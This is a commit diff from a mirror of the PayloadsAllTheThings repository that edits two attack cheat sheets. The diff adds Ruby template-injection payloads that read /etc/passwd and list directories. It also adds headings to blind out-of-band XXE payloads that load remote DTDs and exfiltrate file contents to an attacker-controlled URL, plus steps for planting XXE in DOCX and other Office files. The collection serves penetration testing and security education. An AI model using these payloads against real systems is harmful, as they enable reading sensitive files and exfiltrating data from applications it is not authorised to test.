ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-31 07:27:25 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XXE in docx, pptx, .. : Open XML files

Browse Source
This commit is contained in:
Swissky 2018-11-24 15:50:43 +01:00
parent 1225a9a23d
commit b34cff5a74
2 changed files with 42 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
Server Side Template injections/README.md
View File

@ -15,16 +15,22 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment
### Basic injection
```python
```ruby
<%= 7 * 7 %>
```
### Retrieve /etc/passwd
```python
```ruby
<%= File.open('/etc/passwd').read %>
```
### List files and directories
```ruby
<%= Dir.entries('/') %>
```
## Java
### Java - Basic injection
@ -229,3 +235,4 @@ $eval('1+1')
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)

37
XXE injection/README.md
View File

@ -101,9 +101,9 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
## Blind XXE
## Blind XXE - Out of Band
Blind XXE
### Blind XXE
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
@ -116,7 +116,7 @@ Blind XXE
<foo>&callhome;</foo>
```
XXE OOB Attack (Yunusov, 2013)
### XXE OOB Attack (Yunusov, 2013)
```xml
<?xml version="1.0" encoding="utf-8"?>
@ -129,7 +129,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
%all;
```
XXE OOB with DTD and PHP filter
### XXE OOB with DTD and PHP filter
```xml
<?xml version="1.0" ?>
@ -146,15 +146,42 @@ File stored on http://127.0.0.1/dtd.xml
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
```
XXE Inside SOAP
### XXE Inside SOAP
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
### XXE Inside DOCX file
Format of an Open XML file (inject the payload in any .xml file):
- /_rels/.rels
- [Content_Types].xml
- Default Main Document Part
- /word/document.xml
- /ppt/presentation.xml
- /xl/workbook.xml
Then update the file `zip -u xxe.docx [Content_Types].xml`
Tool : https://github.com/BuffaloWill/oxml_xxe
```xml
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
```
## Thanks to
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)